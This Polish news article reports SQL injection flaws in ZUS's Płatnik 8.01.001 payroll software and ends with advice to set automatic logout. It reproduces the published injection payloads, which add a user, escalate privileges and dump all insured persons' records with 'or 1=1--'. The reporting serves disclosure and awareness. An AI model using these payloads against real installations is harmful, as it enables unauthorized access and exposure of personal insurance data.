Znalazca błędu ukrywający się pod pseudonimem podatnik386 twierdzi, że aplikacja posiada wiele pól podatnych na SQL injection. Opublikowany exploit dotyczy wersji 8.01.001 Płatnika i był testowany na bazie MSSQL2005 Express.
Pole: Administration/Dziennik-Archiwum dziennika operacji
Dodanie nowego użytkownika: <'2010-02-28')INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password hash', '2010-02-28 15:46:48', null, 'A', null)--
Podniesienie uprawnień użytkownika: <'2010-02-28')INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)-- Pole: Documents(ZUS ZSWA) / III-VI tab / - okres pracy
Wyświetlenie wszystkich ubezpieczonych (zapytanie nie zwraca uwagi na uprawnienia pytającego): <05-02-2010) or 1=1--
Znalazca błędu oświadczył, że poinformował ZUS o błędach jednak instytucja zignorowała błędy. Nie wiemy jednak ile czasu pozostawiono ZUS-owi na reakcję. Warto również dodać, że aby wykonać poniższe zapytania trzeba najpierw uzyskać dostęp do oprogramowania Płatnik na komputerze ofiary.
Groźne, niegroźne?
Mimo, że SQL-injection w web aplikacjach jest niewątpliwie błędem bardziej "widowiskowym", to skutki ataku w obu przypadkach są takie same. Biorąc pod uwagę, że zwykli pracownicy (w tym księgowe) często nie są zaawansowanymi użytkownikami komputera, można przypuszczać, że fizyczny dostęp do komputera księgowej w wielu firmach nie będzie stanowił żadnego problemu.
Administratorzy powinni zadbać o auto-wylogowywanie użytkownika po określonym czasie bezczynności - tego typu działania choć trochę zminimalizują zagrożenia związane z zapominającymi się wylogować pracownikami, którzy np. wyszli do kuchni po kawę i zatracili się w rozmowie z kolegami...
źródło: niebezpiecznik
Jeśli chcesz otrzymywać wyczerpujące informacje z serwisu MRT Net, zaprenumeruj nasz